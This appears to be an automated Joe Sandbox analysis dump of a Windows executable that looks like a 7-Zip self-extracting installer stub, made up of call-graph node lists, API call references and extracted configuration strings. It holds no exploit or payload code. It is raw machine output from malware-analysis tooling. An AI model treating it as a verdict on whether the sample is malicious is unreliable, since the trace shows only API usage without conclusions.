4050f9 10336->10337 10338 4048c7 2 API calls 10337->10338 10339 405106 10338->10339 10340 4048c7 2 API calls 10339->10340 10341 405113 10340->10341 10342 4013a9 2 API calls 10341->10342 10343 40511f 12 API calls 10342->10343 10344 4051b4 GetLastError 10343->10344 10345 4051d7 CreateJobObjectW 10343->10345 10346 4051bc ??3@YAXPAX ??3@YAXPAX 10344->10346 10347 405252 ResumeThread WaitForSingleObject 10345->10347 10348 4051ef AssignProcessToJobObject 10345->10348 10346->9850 10350 405262 CloseHandle GetExitCodeProcess 10347->10350 10348->10347 10349 4051fd CreateIoCompletionPort 10348->10349 10349->10347 10351 40520f SetInformationJobObject ResumeThread 10349->10351 10352 405288 CloseHandle 10350->10352 10353 40527f GetLastError 10350->10353 10356 40523d GetQueuedCompletionStatus 10351->10356 10354 405291 CloseHandle 10352->10354 10355 405294 10352->10355 10353->10352 10354->10355 10357 40529a CloseHandle 10355->10357 10358 40529f 10355->10358 10356->10347 10359 405237 10356->10359 10357->10358 10358->10346 10359->10350 10359->10356 10361 4023d9 10360->10361 10362 4023be LoadLibraryA GetProcAddress 10360->10362 10361->9836 10362->10361 10364 401458 2 API calls 10363->10364 10372 404dbf 10364->10372 10365 401370 2 API calls 10365->10372 10366 404e51 10367 404e8b ??3@YAXPAX 10366->10367 10369 404dae 3 API calls 10366->10369 10367->9791 10368 401526 2 API calls 10368->10372 10371 404e88 10369->10371 10370 4026b0 lstrcmpW 10370->10372 10371->10367 10372->10365 10372->10366 10372->10368 10372->10370 10374 407c87 4 API calls 10373->10374 10375 40449f 10374->10375 10375->9766 10376->9749 10378 4054b6 ??3@YAXPAX 10377->10378 10379 40531a 10377->10379 10381 4054bc 10378->10381 10379->10378 10380 40532e GetDriveTypeW 10379->10380 10380->10378 10382 40535a 10380->10382 10381->9752 10383 404545 6 API calls 10382->10383 10384 405368 CreateFileW 10383->10384 10385 405480 ??3@YAXPAX ??3@YAXPAX 10384->10385 10386 40538e 10384->10386 10385->10381 10387 401458 2 API calls 10386->10387 10388 405397 10387->10388 10389 401370 2 API calls 10388->10389 10390 4053a4 10389->10390 10391 4027c2 2 API calls 10390->10391 10392 4053b2 10391->10392 10393 401429 2 API calls 10392->10393 10394 4053be 10393->10394 10395 4027c2 2 API calls 10394->10395 10396 4053cc 10395->10396 10397 4027c2 2 API calls 10396->10397 10398 4053d9 10397->10398 10399 401429 2 API calls 10398->10399 10400 4053e5 10399->10400 10401 4027c2 2 API calls 10400->10401 10402 4053f2 10401->10402 10403 4027c2 2 API calls 10402->10403 10404 4053fb 10403->10404 10405 401429 2 API calls 10404->10405 10406 405407 10405->10406 10407 4027c2 2 API calls 10406->10407 10408 405410 10407->10408 10409 402b20 3 API calls 10408->10409 10410 405422 WriteFile ??3@YAXPAX CloseHandle 10409->10410 10411 405450 10410->10411 10412 405491 10410->10412 10411->10412 10413 405458 SetFileAttributesW ShellExecuteW ??3@YAXPAX 10411->10413 10414 402ff3 16 API calls 10412->10414 10413->10385 10415 405499 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 10414->10415 10415->10381 10425 40250f 10416->10425 10420 401458 2 API calls 10419->10420 10421 402ae4 10420->10421 10422 402b1c 10421->10422 10423 4027aa 2 API calls 10421->10423 10422->9887 10424 402b01 MultiByteToWideChar 10423->10424 10424->10422 10426 402549 10425->10426 10427 40251d ??2@YAPAXI 10425->10427 10426->9887 10427->10426 10428 40252e ??3@YAXPAX 10427->10428 10428->10426 10431 401cc2 10430->10431 10433 401c82 10430->10433 10431->9897 10432 40ccb4 CharUpperW 10432->10433 10433->10431 10433->10432 10434 401ccf 10433->10434 10438 40ccb4 CharUpperW 10434->10438 10436 401cdf 10439 40ccb4 CharUpperW 10436->10439 10438->10436 10439->10431 10440->9921 10442 402390 GetNativeSystemInfo 10441->10442 10443 40239c 10441->10443 10442->9927 10443->9927 10447 40c998 10444->10447 10448 40c95f 2 API calls 10447->10448 10449 405be0 10448->10449 10449->9591 10449->9592 10500 4028b9 10450->10500 10453 4028b9 2 API calls 10454 403bc9 10453->10454 10504 402a0d 10454->10504 10457 4028f3 2 API calls 10458 403be6 ??3@YAXPAX 10457->10458 10459 402a0d 3 API calls 10458->10459 10460 403c01 10459->10460 10461 4028f3 2 API calls 10460->10461 10462 403c0c ??3@YAXPAX 10461->10462 10463 403c22 10462->10463 10464 403c4c 10462->10464 10463->10464 10465 403c27 wsprintfA 10463->10465 10466 403c52 wsprintfA 10464->10466 10467 403c79 10464->10467 10468 402953 2 API calls 10465->10468 10469 402953 2 API calls 10466->10469 10470 402953 2 API calls 10467->10470 10472 403c41 10468->10472 10473 403c6e 10469->10473 10471 403c86 10470->10471 10474 402953 2 API calls 10471->10474 10475 402953 2 API calls 10472->10475 10476 402953 2 API calls 10473->10476 10477 403c8e 10474->10477 10475->10464 10476->10467 10478 402bee 10477->10478 10479 402bfb 10478->10479 10487 40d041 3 API calls 10479->10487 10480 402c0d lstrlenA lstrlenA 10482 402c3a 10480->10482 10481 402d18 10489 4028f3 10481->10489 10482->10481 10483 402ce5 memmove 10482->10483 10484 402c85 memcmp 10482->10484 10485 402cc2 memcmp 10482->10485 10488 40d00d GetLastError 10482->10488 10519 40292b 10482->10519 10483->10481 10483->10482 10484->10481 10484->10482 10485->10482 10487->10480 10488->10482 10490 4028ff 10489->10490 10492 402910 10489->10492 10491 40250f 2 API calls 10490->10491 10491->10492 10492->9948 10494 40255b 2 API calls 10493->10494 10495 402999 10494->10495 10495->9962 10497 402962 10496->10497 10498 40255b 2 API calls 10497->10498 10499 40296f 10498->10499 10499->9948 10501 4028cf 10500->10501 10502 40250f 2 API calls 10501->10502 10503 4028dc 10502->10503 10503->10453 10505 402a28 10504->10505 10506 402a3f 10505->10506 10507 402a34 10505->10507 10508 402823 2 API calls 10506->10508 10516 40286b 10507->10516 10510 402a48 10508->10510 10511 40250f 2 API calls 10510->10511 10513 402a51 10511->10513 10512 402a3d 10512->10457 10514 40286b 2 API calls 10513->10514 10515 402a7f ??3@YAXPAX 10514->10515 10515->10512 10517 40250f 2 API calls 10516->10517 10518 402886 10517->10518 10518->10512 10522 40255b 10519->10522 10523 40259f 10522->10523 10524 40256f 10522->10524 10523->10482 10525 40250f 2 API calls 10524->10525 10525->10523 10527 402697 10526->10527 10528 40266f lstrcmpW 10526->10528 10527->9987 10529 402686 10528->10529 10529->10527 10529->10528 10533 402625 10530->10533 10531 402631 lstrcmpW 10532 40264e 10531->10532 10531->10533 10532->9987 10533->10531 10533->10532 10534->9987 10536 402d4b 10535->10536 10537 402d3f 10535->10537 10539 402823 2 API calls 10536->10539 10553 401bdf GetStdHandle WriteFile 10537->10553 10541 402d55 10539->10541 10540 402d46 10552 40269a ??3@YAXPAX ??3@YAXPAX 10540->10552 10542 402d80 10541->10542 10547 40292b 2 API calls 10541->10547 10543 402ad8 3 API calls 10542->10543 10544 402d92 10543->10544 10545 402da0 10544->10545 10546 402db4 10544->10546 10548 408dbf 57 API calls 10545->10548 10549 408dbf 57 API calls 10546->10549 10547->10541 10550 402daf ??3@YAXPAX ??3@YAXPAX 10548->10550 10549->10550 10550->10540 10552->9977 10553->10540 10555 4043c4 10554->10555 10566 4042ea 10555->10566 10559 40435a 10558->10559 10560 4042ea _wtol 10559->10560 10561 40437b 10560->10561 10561->10029 10563 40438b 10562->10563 10564 4042ea _wtol 10563->10564 10565 4043a3 10564->10565 10565->10035 10567 4042f4 10566->10567 10568 40430f _wtol 10567->10568 10569 404348 10567->10569 10568->10567 10569->10023 10598 410e26 10570->10598 10606 410329 _EH_prolog 10570->10606 10571 40112a 10571->10078 10571->10082 10575 401624 10574->10575 10576 401370 2 API calls 10575->10576 10577 401631 10576->10577 10578 401526 2 API calls 10577->10578 10579 40163a CreateThread 10578->10579 10580 401669 10579->10580 10581 40166e WaitForSingleObject 10579->10581 11005 4012e3 10579->11005 10582 40851f 25 API calls 10580->10582 10583 40168b 10581->10583 10584 4016bd 10581->10584 10582->10581 10587 4016a9 10583->10587 10589 40169a 10583->10589 10585 4016b9 10584->10585 10586 4016c5 GetExitCodeThread 10584->10586 10585->10084 10588 4016dc 10586->10588 10590 408dbf 57 API calls 10587->10590 10588->10585 10588->10589 10591 40170b SetLastError 10588->10591 10589->10585 10592 408dbf 57 API calls 10589->10592 10590->10585 10591->10589 10592->10585 10594 401458 2 API calls 10593->10594 10595 401489 10594->10595 10596 401458 2 API calls 10595->10596 10597 401495 10596->10597 10597->10087 10599 410e38 10598->10599 10605 40d041 3 API calls 10599->10605 10600 410e4c 10603 410e83 10600->10603 10604 40d041 3 API calls 10600->10604 10601 410e60 10601->10603 10622 410ccb 10601->10622 10603->10571 10604->10601 10605->10600 10607 410349 10606->10607 10608 410e26 11 API calls 10607->10608 10609 41036e 10608->10609 10610 410390 10609->10610 10611 410377 10609->10611 10650 4127aa _EH_prolog 10610->10650 10653 40ff49 10611->10653 10635 40e0d0 10622->10635 10624 410cf7 10624->10603 10625 410ce3 10625->10624 10638 40e036 10625->10638 10628 410d30 10629 410dc4 ??3@YAXPAX 10628->10629 10630 410dcf ??3@YAXPAX 10628->10630 10632 410dad memmove 10628->10632 10633 410dd9 memcpy 10628->10633 10629->10624 10630->10624 10632->10628 10634 40d041 3 API calls 10633->10634 10634->10630 10646 40e085 10635->10646 10639 40e080 memcpy 10638->10639 10640 40e043 10638->10640 10639->10628 10641 40e048 ??2@YAPAXI 10640->10641 10642 40e06e 10640->10642 10643 40e070 ??3@YAXPAX 10641->10643 10644 40e058 memmove 10641->10644 10642->10643 10643->10639 10644->10643 10647 40e0c9 10646->10647 10648 40e097 10646->10648 10647->10625 10648->10647 10649 40d00d GetLastError 10648->10649 10649->10648 10661 412525 10650->10661 10988 40fdd9 10653->10988 10683 40fc0a 10661->10683 10806 40fb7b 10683->10806 10807 40cdda ctype 3 API calls 10806->10807 10808 40fb84 10807->10808 10809 40cdda ctype 3 API calls 10808->10809 10810 40fb8c 10809->10810 10811 40cdda ctype 3 API calls 10810->10811 10812 40fb94 10811->10812 10813 40cdda ctype 3 API calls 10812->10813 10814 40fb9c 10813->10814 10815 40cdda ctype 3 API calls 10814->10815 10816 40fba4 10815->10816 10817 40cdda ctype 3 API calls 10816->10817 10818 40fbac 10817->10818 10819 40cdda ctype 3 API calls 10818->10819 10820 40fbb6 10819->10820 10821 40cdda ctype 3 API calls 10820->10821 10822 40fbbe 10821->10822 10823 40cdda ctype 3 API calls 10822->10823 10824 40fbcb 10823->10824 10825 40cdda ctype 3 API calls 10824->10825 10826 40fbd3 10825->10826 10827 40cdda ctype 3 API calls 10826->10827 10828 40fbe0 10827->10828 10829 40cdda ctype 3 API calls 10828->10829 10830 40fbe8 10829->10830 10831 40cdda ctype 3 API calls 10830->10831 10832 40fbf5 10831->10832 10833 40cdda ctype 3 API calls 10832->10833 10834 40fbfd 10833->10834 10989 40cdda ctype 3 API calls 10988->10989 10990 40fde7 10989->10990 11006 4012ec 11005->11006 11007 4012ff 11005->11007 11006->11007 11008 4012ee Sleep 11006->11008 11009 401338 11007->11009 11010 40132a EndDialog 11007->11010 11008->11006 11010->11009 11012 40240b 11011->11012 11012->10093 11013->10145 11015 40133e 2 API calls 11014->11015 11016 4029c5 11015->11016 11017 40133e 2 API calls 11016->11017 11018 4029d1 11017->11018 11018->10188 11020 402823 2 API calls 11019->11020 11021 402b2f 11020->11021 11022 402b6b 11021->11022 11025 4028a1 11021->11025 11022->10213 11026 4028b3 WideCharToMultiByte 11025->11026 11027 4028ad 11025->11027 11026->11022 11028 40250f 2 API calls 11027->11028 11028->11026 11030 407d72 11029->11030 11031 407d6d 11029->11031 11030->11031 11032 407ce8 22 API calls 11030->11032 11031->10243 11032->11031 11033->10243 11034->10249 11035->10251 11036->10253 11037->10257 11038->10259 11039->10263 11040->10267 11041->10271 11043 407c87 4 API calls 11042->11043 11044 407e42 11043->11044 11044->10281 11049 407e53 11045->11049 11048->10285 11050 407c87 4 API calls 11049->11050 11051 407e5b 11050->11051 11051->10282 11052->10293 11054 407c87 4 API calls 11053->11054 11055 407e8d 11054->11055 11055->10298 11056->10301 8704 40c9e5 ReadFile
                                                                                          APIs
                                                                                          • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734
                                                                                            • Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                                            • Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                                            • Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                                            • Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                                            • Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
                                                                                            • Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                                            • Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                                          • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
                                                                                          • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2
                                                                                            • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                                            • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                                            • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                                            • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                                            • Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
                                                                                            • Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434
                                                                                          • _wtol.MSVCRT ref: 00405825
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
                                                                                          • _wtol.MSVCRT ref: 00405A25
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
                                                                                          • wsprintfW.USER32 ref: 00405D2A
                                                                                            • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                                            • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                                            • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                                          • GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E
                                                                                            • Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                                            • Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                                            • Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D
                                                                                          • _wtol.MSVCRT ref: 00405F6B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
                                                                                          • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
                                                                                          • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
                                                                                          • CoInitialize.OLE32(00000000), ref: 004062F2
                                                                                          • _wtol.MSVCRT ref: 00406338
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
                                                                                          • GetKeyState.USER32(00000010), ref: 004063BE
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
                                                                                          • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
                                                                                          • _wtol.MSVCRT ref: 0040686C
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53
                                                                                            • Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
                                                                                            • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                                            • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77
                                                                                            • Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                                            • Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253
                                                                                            • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
                                                                                            • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50
                                                                                            • Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
                                                                                          • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
                                                                                          • String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
                                                                                          • API String ID: 1141480454-1804565692
                                                                                          • Opcode ID: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
                                                                                          • Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
                                                                                          • Opcode Fuzzy Hash: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
                                                                                          • Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 825 401815-401825 826 401831-40185c call 401132 call 41017a 825->826 827 401827-40182c 825->827 832 40185e 826->832 833 40186f-40187b call 401458 826->833 828 401b6f-401b72 827->828 835 401860-40186a call 40cb68 832->835 839 401b51-401b6c ??3@YAXPAX@Z call 40cb68 833->839 840 401881-401886 833->840 841 401b6e 835->841 839->841 840->839 842 40188c-4018c2 call 401370 call 401551 call 4013a9 ??3@YAXPAX@Z 840->842 841->828 852 401b37-401b3a 842->852 853 4018c8-4018e7 842->853 854 401b3c-401b4f ??3@YAXPAX@Z call 40cb68 852->854 858 401902-401906 853->858 859 4018e9-4018fd call 40cb68 ??3@YAXPAX@Z 853->859 854->841 861 401908-40190b 858->861 862 40190d-401912 858->862 859->835 864 40193a-401951 861->864 865 401934-401937 862->865 866 401914 862->866 864->859 869 401953-401976 864->869 865->864 867 401916-40191c 866->867 871 40191e-40192f call 40cb68 ??3@YAXPAX@Z 867->871 874 401991-401997 869->874 875 401978-40198c call 40cb68 ??3@YAXPAX@Z 869->875 871->835 878 4019b3-4019c5 GetLocalTime SystemTimeToFileTime 874->878 879 401999-40199c 874->879 875->835 883 4019cb-4019ce 878->883 881 4019a5-4019b1 879->881 882 40199e-4019a0 879->882 881->883 882->867 884 4019d0-4019da call 4036f1 883->884 885 4019e7-4019ee call 403387 883->885 884->871 892 4019e0-4019e2 884->892 888 4019f3-4019f8 885->888 890 401b23-401b32 GetLastError 888->890 891 4019fe-401a01 888->891 890->852 893 401a07-401a11 ??2@YAPAXI@Z 891->893 894 401b19-401b1c 891->894 892->867 895 401a22 893->895 896 401a13-401a20 893->896 894->890 898 401a24-401a48 call 40ef4a call 40ca5c 895->898 896->898 903 401afe-401b17 call 40f707 call 40cb68 898->903 904 401a4e-401a6c GetLastError call 40133e call 4030c7 898->904 903->854 913 401aa9-401abe call 4036f1 904->913 914 401a6e-401a75 904->914 920 401ac0-401ac8 913->920 921 401aca-401ae2 call 40ca5c 913->921 916 401a79-401a89 ??3@YAXPAX@Z 914->916 918 401a91-401aa4 call 40cb68 ??3@YAXPAX@Z 916->918 919 401a8b-401a8d 916->919 918->835 919->918 920->916 927 401ae4-401af3 GetLastError 921->927 928 401af5-401afd ??3@YAXPAX@Z 921->928 927->916 928->903
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
